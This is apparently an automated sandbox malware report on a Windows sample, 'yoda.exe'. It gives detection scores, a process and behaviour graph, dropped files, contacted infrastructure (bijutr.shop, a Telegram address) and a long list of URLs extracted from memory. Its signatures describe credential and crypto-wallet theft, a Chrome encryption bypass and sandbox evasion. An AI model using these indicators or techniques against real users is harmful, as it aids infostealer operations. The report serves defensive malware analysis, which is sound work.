                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581176 Sample: yoda.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 58 t.me 2->58 60 pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe 2->60 62 bijutr.shop 2->62 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 6 other signatures 2->74 10 yoda.exe 27 2->10         started        signatures3 process4 file5 44 C:\Users\user\AppData\Local\Temp\Tracking, apollo 10->44 dropped 46 C:\Users\user\AppData\...\Qualifications, COM 10->46 dropped 13 cmd.exe 3 10->13         started        process6 file7 48 C:\Users\user\AppData\Local\...\Iceland.com, PE32 13->48 dropped 84 Drops PE files with a suspicious file extension 13->84 17 Iceland.com 42 13->17         started        22 cmd.exe 2 13->22         started        24 conhost.exe 13->24         started        26 7 other processes 13->26 signatures8 process9 dnsIp10 50 t.me 149.154.167.99, 443, 49735 TELEGRAMRU United Kingdom 17->50 52 bijutr.shop 188.245.216.205, 443, 49738, 49740 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 17->52 54 127.0.0.1 unknown unknown 17->54 40 C:\ProgramData\4EK6XL68GLNY\2NG4E3, PE32+ 17->40 dropped 76 Attempt to bypass Chrome Application-Bound Encryption 17->76 78 Found many strings related to Crypto-Wallets (likely being stolen) 17->78 80 Found API chain indicative of sandbox detection 17->80 82 4 other signatures 17->82 28 chrome.exe 17->28         started        31 cmd.exe 1 17->31         started        42 C:\Users\user\AppData\Local\Temp\314782\A, COM 22->42 dropped file11 signatures12 process13 dnsIp14 64 192.168.2.4, 138, 443, 49418 unknown unknown 28->64 66 239.255.255.250 unknown Reserved 28->66 33 chrome.exe 28->33         started        36 conhost.exe 31->36         started        38 timeout.exe 1 31->38         started        process15 dnsIp16 56 www.google.com 172.217.21.36, 443, 49752, 49753 GOOGLEUS United States 33->56

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                yoda.exe33%VirustotalBrowse
                yoda.exe55%ReversingLabsWin32.Trojan.Generic

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\4EK6XL68GLNY\2NG4E30%ReversingLabs
                C:\Users\user\AppData\Local\Temp\314782\Iceland.com0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://publickeyservice.gcp.privacysandboxservices.com0%Avira URL Cloudsafe
                http://anglebug.com/6876J0%Avira URL Cloudsafe
                http://anglebug.com/3586;0%Avira URL Cloudsafe
                http://anglebug.com/8229K0%Avira URL Cloudsafe
                http://anglebug.com/3502N0%Avira URL Cloudsafe
                https://bijutr.shopYMY58GLX0%Avira URL Cloudsafe
                http://anglebug.com/6755:0%Avira URL Cloudsafe
                http://anglebug.com/3452B0%Avira URL Cloudsafe
                https://bijutr.shopL68GLNYl0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bijutr.shop
                		188.245.216.205
                		truefalse
                  		high
                  t.me
                  		149.154.167.99
                  		truefalse
                    		high
                    www.google.com
                    		172.217.21.36
                    		truefalse
                      		high
                      pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe
                      		unknown
                      		unknownfalse
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabIceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drfalse
                          		high
                          https://mail.google.com/mail/?usp=installed_webappchrome.exe, 0000000F.00000002.2214176844.00000278000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://google-ohttp-relay-join.fastly-edge.com/(chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=chrome.exe, 0000000F.00000002.2217971807.0000027800BB4000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drfalse
                                		high
                                https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 0000000F.00000002.2214046498.000002780008C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://google-ohttp-relay-join.fastly-edge.com/2chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://google-ohttp-relay-join.fastly-edge.com/1chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://docs.google.com/document/Jchrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 0000000F.00000002.2216467397.0000027800754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216169540.00000278006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217177896.0000027800950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215455608.000002780048C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://anglebug.com/4633chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://google-ohttp-relay-join.fastly-edge.com/5chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://anglebug.com/7382chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, UAS0ZU.10.drfalse
                                                    		high
                                                    https://google-ohttp-relay-join.fastly-edge.com/4chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://google-ohttp-relay-join.fastly-edge.com/;chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://issuetracker.google.com/284462263chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://anglebug.com/6876Jchrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 0000000F.00000002.2216689699.00000278007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216758327.000002780080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://polymer.github.io/AUTHORS.txtchrome.exe, 0000000F.00000003.2147972601.000002780105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214840441.00000278002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149338496.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2148079725.0000027801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2150131736.000002780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2147686988.0000027800EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149734976.0000027800F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.00000278002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2148018402.0000027800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149247140.0000027800ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2147896060.000002780100C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.google.com/document/:chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://anglebug.com/3452Bchrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://google-ohttp-relay-join.fastly-edge.com/Echrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bijutr.shopYMY58GLXIceland.com, 0000000A.00000002.2871233735.0000000003A4D000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://anglebug.com/6755:chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 0000000F.00000002.2217289206.00000278009BF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://anglebug.com/7714chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://google-ohttp-relay-join.fastly-edge.com/Hchrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://google-ohttp-relay-join.fastly-edge.com/Ochrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://unisolated.invalid/chrome.exe, 0000000F.00000002.2217337654.00000278009C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://google-ohttp-relay-join.fastly-edge.com/Rchrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000000F.00000003.2150131736.000002780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.00000278002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.com/chrome/tips/chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218846363.0000027800D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217204874.0000027800964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216858307.0000027800850000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://drive.google.com/?lfhs=2chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://anglebug.com/6248chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000F.00000002.2226784989.000002780300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://google-ohttp-relay-join.fastly-edge.com/Ychrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://anglebug.com/3586;chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://anglebug.com/6929chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://duckduckgo.com/favicon.icogleschrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/cchrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://anglebug.com/5281chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.youtube.com/?feature=ytcachrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, UAS0ZU.10.drfalse
                                                                                                          		high
                                                                                                          https://google-ohttp-relay-join.fastly-edge.com/fchrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icouechrome.exe, 0000000F.00000002.2217971807.0000027800BB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://chrome.google.com/webstorexchrome.exe, 0000000F.00000002.2216016552.0000027800670000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://issuetracker.google.com/255411748chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 0000000F.00000002.2216689699.00000278007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216758327.000002780080C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anglebug.com/3502Nchrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://anglebug.com/7246chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215402972.0000027800474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://anglebug.com/7369chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://anglebug.com/7489chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://duckduckgo.com/?q=chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/8229Kchrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://chrome.google.com/webstorechrome.exe, 0000000F.00000003.2149376359.0000027800C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2213920187.000002780002C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://drive-daily-2.corp.google.com/chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://polymer.github.io/PATENTS.txtchrome.exe, 0000000F.00000003.2147972601.000002780105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214840441.00000278002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149338496.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2148079725.0000027801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2150131736.000002780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2147686988.0000027800EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149734976.0000027800F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.00000278002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2148018402.0000027800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149247140.0000027800ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2147896060.000002780100C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 0000000F.00000002.2217971807.0000027800BB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drfalse
                                                                                                                                      		high
                                                                                                                                      https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaIceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, UAS0ZU.10.drfalse
                                                                                                                                        		high
                                                                                                                                        https://t.me/k04aelm0nk3Mozilla/5.0Iceland.com, 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.autoitscript.com/autoit3/XIceland.com, 0000000A.00000000.1803221218.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp, Dedicated.0.dr, Iceland.com.1.drfalse
                                                                                                                                            		high
                                                                                                                                            https://issuetracker.google.com/161903006chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.ecosia.org/newtab/Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drfalse
                                                                                                                                                		high
                                                                                                                                                https://drive-daily-1.corp.google.com/chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://drive-daily-5.corp.google.com/chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://duckduckgo.com/favicon.icochrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 0000000F.00000002.2215589639.00000278004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2220472221.0000027801074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 0000000F.00000002.2216467397.0000027800754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217810916.0000027800B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217177896.0000027800950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215455608.000002780048C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://anglebug.com/3078chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://anglebug.com/7553chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/5375chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://anglebug.com/5371chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/4722chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 0000000F.00000002.2215589639.00000278004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2220472221.0000027801074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoresent.chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/7556chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://chromewebstore.google.com/chrome.exe, 0000000F.00000002.2213920187.000002780002C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://drive-preprod.corp.google.com/chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://bijutr.shopL68GLNYlIceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
